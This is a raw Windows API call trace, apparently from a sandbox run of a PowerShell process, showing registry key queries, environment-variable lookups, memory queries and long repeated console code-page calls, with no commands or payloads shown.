[0085.300] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x3d8) returned 0x0
[0085.300] RegQueryInfoKeyW (in: hKey=0x3d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.300] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x3dc) returned 0x0
[0085.300] RegCloseKey (hKey=0x3d8) returned 0x0
[0085.301] RegQueryInfoKeyW (in: hKey=0x3dc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc3c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc38*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.303] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.318] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.381] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.382] CoTaskMemFree (pv=0x2569a0)
[0085.401] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.401] CoTaskMemFree (pv=0x2569a0)
[0085.414] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.414] CoTaskMemFree (pv=0x2569a0)
[0085.424] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.424] CoTaskMemFree (pv=0x2569a0)
[0085.425] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.425] CoTaskMemFree (pv=0x2569a0)
[0085.446] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.446] CoTaskMemFree (pv=0x2569a0)
[0085.459] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.459] CoTaskMemFree (pv=0x2569a0)
[0085.461] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.461] CoTaskMemFree (pv=0x2569a0)
[0085.493] VirtualQuery (in: lpAddress=0x1c818e40, lpBuffer=0x1c819d00, dwLength=0x30 | out: lpBuffer=0x1c819d00*(BaseAddress=0x1c818000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x8000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0085.494] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.494] CoTaskMemFree (pv=0x2569a0)
[0085.581] VirtualQuery (in: lpAddress=0x1c818e40, lpBuffer=0x1c819d00, dwLength=0x30 | out: lpBuffer=0x1c819d00*(BaseAddress=0x1c818000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x8000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0085.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.764] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
[0085.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1c819240 | out: lpConsoleScreenBufferInfo=0x1c819240) returned 1
[0085.783] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.783] CoTaskMemFree (pv=0x2569a0)
[0085.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0085.876] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.876] CoTaskMemFree (pv=0x2569a0)
[0085.912] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
[0085.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1c81a350 | out: lpConsoleScreenBufferInfo=0x1c81a350) returned 1
[0085.914] GetConsoleOutputCP () returned 0x1b5
[0085.914] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1a0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1a0) returned 0
[0085.914] GetConsoleOutputCP () returned 0x1b5
[0085.914] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.915] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.915] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.916] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.916] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.917] GetConsoleOutputCP () returned 0x1b5
[0085.917] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.918] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.918] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.919] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.919] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.920] GetConsoleOutputCP () returned 0x1b5
[0085.920] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
